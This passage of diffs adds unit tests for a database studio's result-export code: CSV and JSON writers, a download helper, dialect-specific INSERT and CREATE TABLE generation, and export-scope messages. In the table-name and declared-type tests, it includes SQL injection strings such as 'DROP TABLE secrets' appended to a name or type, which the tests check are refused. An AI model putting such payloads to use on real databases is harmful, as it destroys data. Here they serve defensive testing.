+  test("writes an empty field for every prototype member a row lacks", () => {
+    const csv = toCsv([{ id: 1 }], ["id", "constructor", "toString", "valueOf", "hasOwnProperty"]);
+    expect(csv).toBe("id,constructor,toString,valueOf,hasOwnProperty\n1,,,,");
+  });
+
+  test("still writes a row's OWN value for a prototype-named column", () => {
+    expect(toCsv([{ toString: "mine" }], ["toString"])).toBe("toString\nmine");
+  });
+});
+
+describe("toCsv — a value JSON cannot serialize", () => {
+  // The writer is reached from the embeddable shell too, where the rows are live
+  // JavaScript objects rather than a parsed HTTP response: a `BigInt` inside a
+  // JSON column, or a self-referencing document, made `JSON.stringify` throw out
+  // of the click handler, so the export produced NO file and said nothing.
+  test("writes a structured value holding a bigint rather than throwing", () => {
+    expect(toCsv([{ j: { n: BigInt(10) } }], ["j"])).toBe('j\n"{""n"":""10""}"');
+  });
+
+  test("writes a self-referencing value rather than throwing", () => {
+    const cyclic: Record<string, unknown> = { name: "root" };
+    cyclic.self = cyclic;
+    const csv = toCsv([{ doc: cyclic }], ["doc"]);
+    expect(csv.startsWith("doc\n")).toBe(true);
+    expect(csv).toContain("root");
+  });
+});

--- a/tests/unit/lib/export/csv.test.ts
+++ b/tests/unit/lib/export/csv.test.ts
@@ -1,0 +1,87 @@
+import { describe, test, expect } from "bun:test";
+import { csvRow, toCsv } from "@/lib/export/csv";
+
+describe("csvRow", () => {
+  test("leaves a value that needs no quoting bare", () => {
+    expect(csvRow(["id", "name", 42])).toBe("id,name,42");
+  });
+
+  test("doubles an embedded quote and wraps the field", () => {
+    expect(csvRow(['he said "hi"'])).toBe('"he said ""hi"""');
+  });
+
+  test("wraps a field holding the delimiter", () => {
+    expect(csvRow(["Acme, Inc."])).toBe('"Acme, Inc."');
+  });
+
+  test("wraps a field holding a newline, so the row cannot be split by a reader", () => {
+    expect(csvRow(["line one\nline two"])).toBe('"line one\nline two"');
+    expect(csvRow(["carriage\rreturn"])).toBe('"carriage\rreturn"');
+  });
+
+  test("writes an absent value as an empty field, not as the text of the absence", () => {
+    expect(csvRow([null, undefined, ""])).toBe(",,");
+  });
+
+  test("writes a date in a form another tool can parse back", () => {
+    expect(csvRow([new Date("2026-08-17T06:31:49.000Z")])).toBe("2026-08-17T06:31:49.000Z");
+  });
+
+  test("serializes a structured value instead of stringifying it to [object Object]", () => {
+    expect(csvRow([{ a: 1 }])).toBe('"{""a"":1}"');
+    expect(csvRow([[1, 2]])).toBe('"[1,2]"');
+  });
+
+  test("writes a boolean and a bigint as themselves", () => {
+    expect(csvRow([true, false, BigInt(10)])).toBe("true,false,10");
+  });
+});
+
+describe("toCsv", () => {
+  test("writes the header from the declared columns and reads each row by name", () => {
+    const csv = toCsv([{ b: 2, a: 1 }], ["a", "b"]);
+    expect(csv).toBe("a,b\n1,2");
+  });
+
+  test("reads every row by column name, so a differing key order cannot shift a column", () => {
+    const csv = toCsv(
+      [
+        { a: 1, b: 2 },
+        { b: 20, a: 10 },
+      ],
+      ["a", "b"],
+    );
+    expect(csv).toBe("a,b\n1,2\n10,20");
+  });
+
+  test("covers a key that only a later row carries when no columns are declared", () => {
+    const csv = toCsv([{ a: 1 }, { a: 2, b: 3 }]);
+    expect(csv).toBe("a,b\n1,\n2,3");
+  });
+
+  test("leaves a column a row does not carry empty rather than shifting the ones after it", () => {
+    const csv = toCsv([{ a: 1, c: 3 }], ["a", "b", "c"]);
+    expect(csv).toBe("a,b,c\n1,,3");
+  });
+
+  test("quotes a column name that needs it", () => {
+    expect(toCsv([{ 'od"d': 1 }])).toBe('"od""d"\n1');
+  });
+
+  test("escapes a cell, so one quote cannot break every row after it", () => {
+    const csv = toCsv([{ note: 'say "no"' }, { note: "plain" }], ["note"]);
+    expect(csv).toBe('note\n"say ""no"""\nplain');
+  });
+
+  test("falls back to the rows' own keys when the declared column list is empty", () => {
+    expect(toCsv([{ a: 1 }], [])).toBe("a\n1");
+  });
+
+  test("writes nothing at all for no rows and no declared columns", () => {
+    expect(toCsv([])).toBe("");
+  });
+
+  test("writes a header with no rows under it when the columns are known but empty", () => {
+    expect(toCsv([], ["a", "b"])).toBe("a,b");
+  });
+});

--- a/tests/unit/lib/export/download.test.ts
+++ b/tests/unit/lib/export/download.test.ts
@@ -1,0 +1,91 @@
+import { describe, test, expect, beforeEach, afterEach } from "bun:test";
+import { downloadBlob, downloadText } from "@/lib/export/download";
+
+interface Recorded {
+  created: Blob[];
+  revoked: string[];
+  clicked: { href: string; download: string; inDocument: boolean }[];
+}
+
+let recorded: Recorded;
+let originalCreate: typeof URL.createObjectURL | undefined;
+let originalRevoke: typeof URL.revokeObjectURL | undefined;
+let originalClick: () => void;
+
+beforeEach(() => {
+  recorded = { created: [], revoked: [], clicked: [] };
+  originalCreate = URL.createObjectURL;
+  originalRevoke = URL.revokeObjectURL;
+  URL.createObjectURL = (blob: Blob) => {
+    recorded.created.push(blob);
+    return `blob:test/${recorded.created.length}`;
+  };
+  URL.revokeObjectURL = (url: string) => {
+    recorded.revoked.push(url);
+  };
+
+  // happy-dom's anchor click would navigate; record the state at click time
+  // instead, which is the only moment at which "is it attached?" can be asked.
+  originalClick = HTMLAnchorElement.prototype.click;
+  HTMLAnchorElement.prototype.click = function (this: HTMLAnchorElement) {
+    recorded.clicked.push({
+      href: this.href,
+      download: this.download,
+      inDocument: document.body.contains(this),
+    });
+  };
+});
+
+afterEach(async () => {
+  // Drain this test's own revoke timer before the stubs go back, so it cannot
+  // land in the NEXT test's recorder — the timer resolves `URL.revokeObjectURL`
+  // when it fires, not when it was queued.
+  await nextTask();
+  URL.createObjectURL = originalCreate as typeof URL.createObjectURL;
+  URL.revokeObjectURL = originalRevoke as typeof URL.revokeObjectURL;
+  HTMLAnchorElement.prototype.click = originalClick;
+});
+
+/** Let the macrotask the revoke is queued on run. */
+const nextTask = () => new Promise((resolve) => setTimeout(resolve, 0));
+
+describe("downloadBlob", () => {
+  test("clicks a link that is attached to the document, which is what Firefox honours", () => {
+    downloadBlob(new Blob(["x"]), "report.csv");
+
+    expect(recorded.clicked).toHaveLength(1);
+    expect(recorded.clicked[0].inDocument).toBe(true);
+    expect(recorded.clicked[0].download).toBe("report.csv");
+    expect(recorded.clicked[0].href).toContain("blob:test/1");
+  });
+
+  test("leaves no anchor behind in the document", () => {
+    downloadBlob(new Blob(["x"]), "report.csv");
+
+    expect(document.querySelectorAll("a[download]")).toHaveLength(0);
+  });
+
+  test("does not revoke the URL in the task that started the download", () => {
+    downloadBlob(new Blob(["x"]), "report.csv");
+
+    expect(recorded.revoked).toEqual([]);
+  });
+
+  test("revokes the URL once the download has been handed off", async () => {
+    downloadBlob(new Blob(["x"]), "report.csv");
+    await nextTask();
+
+    expect(recorded.revoked).toEqual(["blob:test/1"]);
+  });
+});
+
+describe("downloadText", () => {
+  test("wraps the text in a blob of the declared type", async () => {
+    downloadText("a,b\n1,2", "text/csv", "rows.csv");
+
+    expect(recorded.created).toHaveLength(1);
+    expect(recorded.created[0].type).toBe("text/csv");
+    expect(await recorded.created[0].text()).toBe("a,b\n1,2");
+    expect(recorded.clicked[0].download).toBe("rows.csv");
+  });
+});

--- a/tests/unit/lib/export/download.test.ts
+++ b/tests/unit/lib/export/download.test.ts
@@ -81,11 +81,50 @@ describe("downloadBlob", () => {
 
 describe("downloadText", () => {
   test("wraps the text in a blob of the declared type", async () => {
-    downloadText("a,b\n1,2", "text/csv", "rows.csv");
+    downloadText('{"a":1}', "application/json", "rows.json");
 
     expect(recorded.created).toHaveLength(1);
-    expect(recorded.created[0].type).toBe("text/csv");
-    expect(await recorded.created[0].text()).toBe("a,b\n1,2");
-    expect(recorded.clicked[0].download).toBe("rows.csv");
+    expect(recorded.created[0].type).toStartWith("application/json");
+    expect(await recorded.created[0].text()).toBe('{"a":1}');
+    expect(recorded.clicked[0].download).toBe("rows.json");
+  });
+
+  // Read as BYTES, not through `blob.text()`: the text decoder strips a leading BOM
+  // per spec, so a text assertion here passes whether the mark is written or not.
+  const firstBytes = async (blob: Blob, count: number) => [...new Uint8Array(await blob.arrayBuffer()).slice(0, count)];
+
+  // Excel decides a CSV's encoding from its first bytes, not from the charset on the
+  // download: without the mark it reads UTF-8 as the host's legacy code page, and
+  // every non-ASCII name in the file arrives mangled. Every other reader treats the
+  // mark as insignificant.
+  test("puts the byte order mark Excel needs in front of a CSV", async () => {
+    downloadText("ad,şehir\nÖmer,İstanbul", "text/csv;charset=utf-8", "rows.csv");
+
+    expect(await firstBytes(recorded.created[0], 3)).toEqual([0xef, 0xbb, 0xbf]);
+    expect(await recorded.created[0].text()).toBe("ad,şehir\nÖmer,İstanbul");
+  });
+
+  test("marks a CSV even when the caller named the type without a charset", async () => {
+    downloadText("a,b", "text/csv", "rows.csv");
+
+    expect(await firstBytes(recorded.created[0], 3)).toEqual([0xef, 0xbb, 0xbf]);
+  });
+
+  test("leaves SQL bytes alone, so the first statement is still the first byte", async () => {
+    downloadText("INSERT INTO t (a) VALUES (1);", "text/sql", "rows.sql");
+
+    expect(await firstBytes(recorded.created[0], 1)).toEqual(["I".charCodeAt(0)]);
+  });
+
+  test("leaves markdown bytes alone", async () => {
+    downloadText("# Docs", "text/markdown", "docs.md");
+
+    expect(await firstBytes(recorded.created[0], 1)).toEqual(["#".charCodeAt(0)]);
+  });
+
+  test("leaves JSON bytes alone, so a strict parser still reads the first token", async () => {
+    downloadText('{"a":1}', "application/json", "rows.json");
+
+    expect(await firstBytes(recorded.created[0], 1)).toEqual(["{".charCodeAt(0)]);
   });
 });

--- a/tests/unit/lib/export/json.test.ts
+++ b/tests/unit/lib/export/json.test.ts
@@ -1,0 +1,75 @@
+import { describe, test, expect } from "bun:test";
+import { jsonText } from "@/lib/export/json";
+
+describe("jsonText", () => {
+  test("writes an ordinary value the way JSON.stringify does", () => {
+    expect(jsonText({ id: 1, name: "ada", ok: true, missing: null })).toBe(
+      '{"id":1,"name":"ada","ok":true,"missing":null}',
+    );
+  });
+
+  test("indents when asked, which is what the JSON export writes", () => {
+    expect(jsonText([{ id: 1 }], 2)).toBe('[\n  {\n    "id": 1\n  }\n]');
+  });
+
+  test("writes a scalar handed in on its own", () => {
+    expect(jsonText("plain")).toBe('"plain"');
+    expect(jsonText(7)).toBe("7");
+  });
+
+  // A bigint has no JSON form, and `JSON.stringify` throws rather than dropping it.
+  test("writes a bigint as its digits rather than throwing", () => {
+    expect(jsonText({ big: BigInt("9007199254740993") })).toBe('{"big":"9007199254740993"}');
+  });
+
+  test("writes a bigint nested in an array", () => {
+    expect(jsonText({ ids: [BigInt(1), BigInt(2)] })).toBe('{"ids":["1","2"]}');
+  });
+
+  test("writes a bigint handed in on its own", () => {
+    expect(jsonText(BigInt(10))).toBe('"10"');
+  });
+
+  // The value contains itself: there is no JSON form, so the cycle is named and
+  // everything around it still lands in the file.
+  test("names a cycle instead of throwing, and keeps the rest of the value", () => {
+    const doc: Record<string, unknown> = { name: "root" };
+    doc.self = doc;
+    expect(jsonText(doc)).toBe('{"name":"root","self":"[Circular]"}');
+  });
+
+  test("names a cycle that closes further down", () => {
+    const parent: Record<string, unknown> = { name: "parent" };
+    parent.child = { name: "child", parent };
+    expect(jsonText(parent)).toBe('{"name":"parent","child":{"name":"child","parent":"[Circular]"}}');
+  });
+
+  test("names a cycle through an array", () => {
+    const items: unknown[] = [1];
+    items.push(items);
+    expect(jsonText({ items })).toBe('{"items":[1,"[Circular]"]}');
+  });
+
+  // The same object under two keys is ordinary in a result set — a shared lookup
+  // row, a repeated sub-document. Only an ANCESTOR is a cycle.
+  test("keeps both copies of a value referenced twice as siblings", () => {
+    const shared = { code: "TR" };
+    expect(jsonText({ from: shared, to: shared })).toBe('{"from":{"code":"TR"},"to":{"code":"TR"}}');
+  });
+
+  test("keeps both copies of a value repeated in an array", () => {
+    const shared = { code: "TR" };
+    expect(jsonText([shared, shared])).toBe('[{"code":"TR"},{"code":"TR"}]');
+  });
+
+  // `toJSON` is how a Date and every BSON value spell themselves; walking the value
+  // without honouring it would turn a timestamp into `{}`.
+  test("honours toJSON, so a date is its ISO string", () => {
+    expect(jsonText({ at: new Date("2026-08-18T09:00:00.000Z") })).toBe('{"at":"2026-08-18T09:00:00.000Z"}');
+  });
+
+  test("walks what toJSON returns, so a bigint inside it is still written", () => {
+    const bson = { toJSON: () => ({ $numberLong: BigInt(42) }) };
+    expect(jsonText({ count: bson })).toBe('{"count":{"$numberLong":"42"}}');
+  });
+});

--- a/tests/unit/lib/export/result-export.test.ts
+++ b/tests/unit/lib/export/result-export.test.ts
@@ -1,0 +1,195 @@
+import { describe, test, expect } from "bun:test";
+import { buildResultExport, deriveTableName, FALLBACK_TABLE_NAME } from "@/lib/export/result-export";
+
+const source = (over: Partial<Parameters<typeof buildResultExport>[1]> = {}) => ({
+  rows: [{ id: 1, name: "Ada" }],
+  fields: ["id", "name"],
+  tabName: "users",
+  dialect: "postgres" as const,
+  ...over,
+});
+
+describe("deriveTableName", () => {
+  test("keeps a tab name that is already a bare identifier", () => {
+    expect(deriveTableName("users")).toBe("users");
+  });
+
+  test("strips the generated tab prefix the studio writes", () => {
+    expect(deriveTableName("Query: orders")).toBe("orders");
+    expect(deriveTableName("Query 1")).toBe(FALLBACK_TABLE_NAME);
+  });
+
+  test("keeps a schema-qualified name", () => {
+    expect(deriveTableName("public.users")).toBe("public.users");
+  });
+
+  test("refuses a name that would carry statement text into the file", () => {
+    expect(deriveTableName("users; DROP TABLE secrets")).toBe(FALLBACK_TABLE_NAME);
+    expect(deriveTableName('users" ("')).toBe(FALLBACK_TABLE_NAME);
+  });
+
+  test("refuses a name with a space rather than emitting broken SQL", () => {
+    expect(deriveTableName("my table")).toBe(FALLBACK_TABLE_NAME);
+  });
+
+  test("falls back when the tab name is empty once the prefix is gone", () => {
+    expect(deriveTableName("Query:  ")).toBe(FALLBACK_TABLE_NAME);
+    expect(deriveTableName("")).toBe(FALLBACK_TABLE_NAME);
+  });
+});
+
+describe("buildResultExport — csv", () => {
+  test("writes an escaped CSV under the declared columns", () => {
+    const file = buildResultExport("csv", source({ rows: [{ id: 1, name: 'A,"B"' }] }));
+
+    expect(file.content).toBe('id,name\n1,"A,""B"""');
+    expect(file.mimeType).toBe("text/csv");
+    expect(file.extension).toBe("csv");
+  });
+});
+
+describe("buildResultExport — json", () => {
+  test("writes the rows as indented JSON", () => {
+    const file = buildResultExport("json", source());
+
+    expect(JSON.parse(file.content)).toEqual([{ id: 1, name: "Ada" }]);
+    expect(file.mimeType).toBe("application/json");
+    expect(file.extension).toBe("json");
+  });
+});
+
+describe("buildResultExport — sql-insert", () => {
+  test("quotes every column name, so an aliased column cannot break the statement", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ "total count": 3 }], fields: ["total count"] }));
+
+    expect(file.content).toBe('INSERT INTO users ("total count") VALUES (3);');
+    expect(file.mimeType).toBe("text/sql");
+    expect(file.extension).toBe("sql");
+  });
+
+  test("spells identifiers the way the dialect does", () => {
+    const file = buildResultExport("sql-insert", source({ dialect: "mysql" }));
+
+    expect(file.content).toBe("INSERT INTO users (`id`, `name`) VALUES (1, 'Ada');");
+  });
+
+  test("quotes a value through the dialect's own literal grammar", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ id: 1, name: "O'Hara\\" }] }));
+
+    expect(file.content).toContain("'O''Hara\\'");
+  });
+
+  test("writes an absent value as NULL", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ id: null, name: undefined }] }));
+
+    expect(file.content).toBe('INSERT INTO users ("id", "name") VALUES (NULL, NULL);');
+  });
+
+  test("writes a column the row does not carry as NULL instead of shifting the rest", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ name: "Ada" }] }));
+
+    expect(file.content).toBe('INSERT INTO users ("id", "name") VALUES (NULL, \'Ada\');');
+  });
+
+  test("writes numbers, bigints and booleans unquoted", () => {
+    const file = buildResultExport(
+      "sql-insert",
+      source({ rows: [{ a: 1.5, b: BigInt("9007199254740993"), c: true }], fields: ["a", "b", "c"] }),
+    );
+
+    expect(file.content).toContain("VALUES (1.5, 9007199254740993, true);");
+  });
+
+  test("writes a non-finite number as NULL, because NaN is not a SQL number", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ a: NaN, b: Infinity }], fields: ["a", "b"] }));
+
+    expect(file.content).toContain("VALUES (NULL, NULL);");
+  });
+
+  test("writes a date as an ISO literal rather than as a locale string", () => {
+    const file = buildResultExport(
+      "sql-insert",
+      source({ rows: [{ at: new Date("2026-08-17T06:31:49.000Z") }], fields: ["at"] }),
+    );
+
+    expect(file.content).toContain("VALUES ('2026-08-17T06:31:49.000Z');");
+  });
+
+  test("writes a structured value as JSON rather than as [object Object]", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ meta: { a: 1 } }], fields: ["meta"] }));
+
+    expect(file.content).toContain(`VALUES ('{"a":1}');`);
+  });
+
+  test("writes one statement per row", () => {
+    const file = buildResultExport(
+      "sql-insert",
+      source({
+        rows: [
+          { id: 1, name: "Ada" },
+          { id: 2, name: "Ben" },
+        ],
+      }),
+    );
+
+    expect(file.content.split("\n")).toHaveLength(2);
+  });
+
+  test("emits nothing for a result with no rows", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [] }));
+
+    expect(file.content).toBe("");
+  });
+});
+
+describe("buildResultExport — sql-ddl", () => {
+  test("types each column from the first row that actually carries a value", () => {
+    const file = buildResultExport(
+      "sql-ddl",
+      source({
+        rows: [
+          { id: null, score: null, ok: null, at: null },
+          { id: 4, score: 1.5, ok: true, at: new Date("2026-08-17T00:00:00.000Z") },
+        ],
+        fields: ["id", "score", "ok", "at"],
+      }),
+    );
+
+    expect(file.content).toBe(
+      'CREATE TABLE users (\n  "id" INTEGER,\n  "score" NUMERIC,\n  "ok" BOOLEAN,\n  "at" TIMESTAMP\n);',
+    );
+  });
+
+  test("falls back to TEXT for a column that is null in every row", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [{ note: null }], fields: ["note"] }));
+
+    expect(file.content).toContain('"note" TEXT');
+  });
+
+  test("types a bigint as an integer column", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [{ n: BigInt(10) }], fields: ["n"] }));
+
+    expect(file.content).toContain('"n" INTEGER');
+  });
+
+  test("quotes column names for the dialect", () => {
+    const file = buildResultExport("sql-ddl", source({ dialect: "mssql" }));
+
+    expect(file.content).toContain("[id] INTEGER");
+    expect(file.content).toContain("[name] TEXT");
+  });
+
+  test("uses the fallback table name when the tab name cannot be one", () => {
+    const file = buildResultExport("sql-ddl", source({ tabName: "Query 3" }));
+
+    expect(file.content).toContain(`CREATE TABLE ${FALLBACK_TABLE_NAME} (`);
+  });
+});
+
+describe("buildResultExport — columns", () => {
+  test("falls back to the rows' own keys when the result declared no fields", () => {
+    const file = buildResultExport("csv", source({ fields: [], rows: [{ a: 1 }, { b: 2 }] }));
+
+    expect(file.content).toBe("a,b\n1,\n,2");
+  });
+});

--- a/tests/unit/lib/export/result-export.test.ts
+++ b/tests/unit/lib/export/result-export.test.ts
@@ -43,7 +43,7 @@ describe("buildResultExport — csv", () => {
     const file = buildResultExport("csv", source({ rows: [{ id: 1, name: 'A,"B"' }] }));
 
     expect(file.content).toBe('id,name\n1,"A,""B"""');
-    expect(file.mimeType).toBe("text/csv");
+    expect(file.mimeType).toBe("text/csv;charset=utf-8");
     expect(file.extension).toBe("csv");
   });
 });
@@ -135,10 +135,19 @@ describe("buildResultExport — sql-insert", () => {
     expect(file.content.split("\n")).toHaveLength(2);
   });
 
-  test("emits nothing for a result with no rows", () => {
+  // A 0-byte file is not wrong, it is unexplained: the user asked for an export and
+  // got something they cannot tell apart from a failed one. A comment is valid SQL
+  // everywhere and says which of the two happened.
+  test("says so in a SQL comment when there are no rows to write", () => {
     const file = buildResultExport("sql-insert", source({ rows: [] }));
 
-    expect(file.content).toBe("");
+    expect(file.content).toBe("-- No rows to export.");
+  });
+
+  test("says so when the result declares no columns at all", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{}], fields: [] }));
+
+    expect(file.content).toBe("-- No columns to export.");
   });
 });
 
@@ -156,7 +165,7 @@ describe("buildResultExport — sql-ddl", () => {
     );
 
     expect(file.content).toBe(
-      'CREATE TABLE users (\n  "id" INTEGER,\n  "score" NUMERIC,\n  "ok" BOOLEAN,\n  "at" TIMESTAMP\n);',
+      'CREATE TABLE users (\n  "id" BIGINT,\n  "score" DOUBLE PRECISION,\n  "ok" BOOLEAN,\n  "at" TIMESTAMP\n);',
     );
   });
 
@@ -169,14 +178,14 @@ describe("buildResultExport — sql-ddl", () => {
   test("types a bigint as an integer column", () => {
     const file = buildResultExport("sql-ddl", source({ rows: [{ n: BigInt(10) }], fields: ["n"] }));
 
-    expect(file.content).toContain('"n" INTEGER');
+    expect(file.content).toContain('"n" BIGINT');
   });
 
   test("quotes column names for the dialect", () => {
     const file = buildResultExport("sql-ddl", source({ dialect: "mssql" }));
 
-    expect(file.content).toContain("[id] INTEGER");
-    expect(file.content).toContain("[name] TEXT");
+    expect(file.content).toContain("[id] BIGINT");
+    expect(file.content).toContain("[name] NVARCHAR(MAX)");
   });
 
   test("uses the fallback table name when the tab name cannot be one", () => {
@@ -191,5 +200,170 @@ describe("buildResultExport — columns", () => {
     const file = buildResultExport("csv", source({ fields: [], rows: [{ a: 1 }, { b: 2 }] }));
 
     expect(file.content).toBe("a,b\n1,\n,2");
+  });
+});
+
+describe("buildResultExport — a DDL type the engine can actually parse", () => {
+  // The statement is meant to be run against the engine it was read from, and half
+  // of these dialects reject the generic set: Oracle has no TEXT and no BOOLEAN
+  // before 23c, SQL Server has no BOOLEAN at all, and a bare NUMERIC on MySQL is
+  // DECIMAL(10,0) — which silently truncates every decimal it was chosen for.
+  const row = { t: "x", i: 4, n: 1.5, b: true, at: new Date("2026-08-17T00:00:00.000Z") };
+  const fields = ["t", "i", "n", "b", "at"];
+
+  test("spells every inferred type the way Oracle does", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [row], fields, dialect: "oracle" }));
+
+    expect(file.content).toContain('"t" VARCHAR2(4000)');
+    expect(file.content).toContain('"i" NUMBER(19)');
+    expect(file.content).toContain('"n" BINARY_DOUBLE');
+    expect(file.content).toContain('"b" NUMBER(1)');
+    expect(file.content).toContain('"at" TIMESTAMP');
+  });
+
+  test("spells every inferred type the way SQL Server does", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [row], fields, dialect: "mssql" }));
+
+    expect(file.content).toContain("[t] NVARCHAR(MAX)");
+    expect(file.content).toContain("[i] BIGINT");
+    expect(file.content).toContain("[n] FLOAT");
+    expect(file.content).toContain("[b] BIT");
+    expect(file.content).toContain("[at] DATETIME2");
+  });
+
+  test("spells the two MySQL disagrees about the way MySQL does", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [row], fields, dialect: "mysql" }));
+
+    expect(file.content).toContain("`n` DOUBLE");
+    expect(file.content).toContain("`at` DATETIME");
+  });
+
+  test("keeps the standard spelling for the dialects that accept it", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [row], fields, dialect: "postgres" }));
+
+    expect(file.content).toContain('"t" TEXT');
+    expect(file.content).toContain('"i" BIGINT');
+    expect(file.content).toContain('"n" DOUBLE PRECISION');
+    expect(file.content).toContain('"b" BOOLEAN');
+  });
+
+  test("uses the standard spelling when no dialect is connected", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [row], fields, dialect: undefined }));
+
+    expect(file.content).toContain('"i" BIGINT');
+  });
+});
+
+describe("buildResultExport — the type the engine itself declared", () => {
+  // `QueryResult.columnTypes` is the type the wire format declared for THIS result,
+  // which is the only source for a computed column, and it is spelled the way the
+  // engine spells it. Inferring from a sample value is the fallback, not the rule.
+  test("prefers the declared type over one inferred from a value", () => {
+    const file = buildResultExport(
+      "sql-ddl",
+      source({ rows: [{ n: 1 }], fields: ["n"], columnTypes: { n: "Nullable(Int64)" } }),
+    );
+
+    expect(file.content).toContain('"n" Nullable(Int64)');
+  });
+
+  test("infers the type for a column the declaration does not cover", () => {
+    const file = buildResultExport(
+      "sql-ddl",
+      source({ rows: [{ a: 1, b: "x" }], fields: ["a", "b"], columnTypes: { a: "DECIMAL(10, 2)" } }),
+    );
+
+    expect(file.content).toContain('"a" DECIMAL(10, 2)');
+    expect(file.content).toContain('"b" TEXT');
+  });
+
+  test("does not read a declared type off the prototype chain", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [{ constructor: "x" }], fields: ["constructor"] }));
+
+    expect(file.content).toContain('"constructor" TEXT');
+  });
+
+  // The file is run somewhere else, unattended (#290): a declared type is engine
+  // output, so it is data until it has been checked. Anything that could carry
+  // statement text is refused and the inferred type stands in.
+  test("refuses a declared type that could carry statement text", () => {
+    const file = buildResultExport(
+      "sql-ddl",
+      source({ rows: [{ a: "x" }], fields: ["a"], columnTypes: { a: "TEXT); DROP TABLE secrets; --" } }),
+    );
+
+    expect(file.content).toBe('CREATE TABLE users (\n  "a" TEXT\n);');
+  });
+
+  test("refuses a declared type holding a quote", () => {
+    const file = buildResultExport(
+      "sql-ddl",
+      source({ rows: [{ a: 1 }], fields: ["a"], columnTypes: { a: 'ENUM("a")' } }),
+    );
+
+    expect(file.content).toContain('"a" BIGINT');
+  });
+
+  test("refuses an empty declared type", () => {
+    const file = buildResultExport("sql-ddl", source({ rows: [{ a: 1 }], fields: ["a"], columnTypes: { a: "" } }));
+
+    expect(file.content).toContain('"a" BIGINT');
+  });
+});
+
+describe("buildResultExport — a column name that is also a prototype member", () => {
+  // `row[column]` walks the prototype chain, so a header naming a field this row has
+  // no own entry for resolved to an inherited member — and the native `Object`
+  // function reached the file as a quoted literal.
+  test("writes NULL for a prototype-named column the row does not carry", () => {
+    const file = buildResultExport(
+      "sql-insert",
+      source({ rows: [{ constructor: "own" }, { id: 2 }], fields: ["constructor"] }),
+    );
+
+    expect(file.content).toBe(
+      'INSERT INTO users ("constructor") VALUES (\'own\');\nINSERT INTO users ("constructor") VALUES (NULL);',
+    );
+  });
+
+  test("leaves a prototype-named column out of the CSV cell it does not own", () => {
+    const file = buildResultExport("csv", source({ rows: [{ id: 1 }], fields: ["id", "toString"] }));
+
+    expect(file.content).toBe("id,toString\n1,");
+  });
+});
+
+describe("buildResultExport — a value JSON cannot serialize", () => {
+  test("writes a bigint inside a structured value rather than throwing", () => {
+    const file = buildResultExport("sql-insert", source({ rows: [{ meta: { n: BigInt(10) } }], fields: ["meta"] }));
+
+    expect(file.content).toContain(`VALUES ('{"n":"10"}')`);
+  });
+
+  test("writes a self-referencing value rather than throwing", () => {
+    const doc: Record<string, unknown> = { name: "root" };
+    doc.self = doc;
+    const file = buildResultExport("json", source({ rows: [{ doc }], fields: ["doc"] }));
+
+    expect(file.content).toContain("[Circular]");
+  });
+});
+
+describe("deriveTableName — the generated prefix needs a separator", () => {
+  // The prefix the studio writes is `Query 1`, `Query: users`. Stripping a bare
+  // `Query` turned a tab renamed after a real table into a different table: an
+  // export from a tab named `QueryLog` wrote `INSERT INTO Log`.
+  test("keeps a name that merely starts with the word", () => {
+    expect(deriveTableName("QueryLog")).toBe("QueryLog");
+    expect(deriveTableName("QueryStats")).toBe("QueryStats");
+  });
+
+  test("still strips the prefix when a separator follows it", () => {
+    expect(deriveTableName("Query users")).toBe("users");
+    expect(deriveTableName("Query:orders")).toBe("orders");
+  });
+
+  test("falls back for the bare generated name", () => {
+    expect(deriveTableName("Query")).toBe(FALLBACK_TABLE_NAME);
   });
 });

--- a/tests/unit/lib/export/scope.test.ts
+++ b/tests/unit/lib/export/scope.test.ts
@@ -1,0 +1,52 @@
+import { describe, test, expect } from "bun:test";
+import { describeExportScope } from "@/lib/export/scope";
+
+const rows = (count: number) => Array.from({ length: count }, (_, i) => ({ id: i }));
+
+describe("describeExportScope", () => {
+  test("counts the rows the file will actually contain", () => {
+    expect(describeExportScope({ rows: rows(3) }).rowCount).toBe(3);
+  });
+
+  test("groups the digits, so a large count is readable at a glance", () => {
+    expect(describeExportScope({ rows: rows(1234) }).countLabel).toBe("1,234");
+  });
+
+  test("says the whole result is written when nothing was held back", () => {
+    const scope = describeExportScope({ rows: rows(42) });
+
+    expect(scope.summary).toBe("Writes all 42 rows.");
+    expect(scope.shortfall).toBeNull();
+  });
+
+  test("agrees with itself about a single row", () => {
+    expect(describeExportScope({ rows: rows(1) }).summary).toBe("Writes all 1 row.");
+  });
+
+  test("says nothing is written for an empty result", () => {
+    expect(describeExportScope({ rows: [] }).summary).toBe("Writes all 0 rows.");
+  });
+
+  // The grid holds one page. Exporting it produces a well-formed file with a
+  // plausible number of rows in it, which is exactly why the shortfall has to be
+  // stated rather than left for the user to discover downstream.
+  test("says only the loaded rows are written when the engine held more back", () => {
+    const scope = describeExportScope({
+      rows: rows(500),
+      pagination: { limit: 500, offset: 0, hasMore: true, totalReturned: 500, wasLimited: true },
+    });
+
+    expect(scope.summary).toBe("Writes the 500 rows loaded here.");
+    expect(scope.shortfall).toBe("More rows are still on the server — load them first to include them.");
+  });
+
+  test("a limit the result fit inside is not a shortfall", () => {
+    const scope = describeExportScope({
+      rows: rows(12),
+      pagination: { limit: 500, offset: 0, hasMore: false, totalReturned: 12, wasLimited: true },
+    });
+
+    expect(scope.summary).toBe("Writes all 12 rows.");
+    expect(scope.shortfall).toBeNull();
+  });
+});

--- a/tests/unit/lib/ids.test.ts
+++ b/tests/unit/lib/ids.test.ts
@@ -1,0 +1,35 @@
+import { describe, test, expect } from "bun:test";
+import { newLocalId } from "@/lib/ids";
+
+describe("newLocalId", () => {
+  test("mints a non-empty id", () => {
+    expect(newLocalId().length).toBeGreaterThan(0);
+  });
+
+  test("draws from the crypto generator, not from Math.random", () => {
+    const values: number[] = [];
+    const original = crypto.getRandomValues;
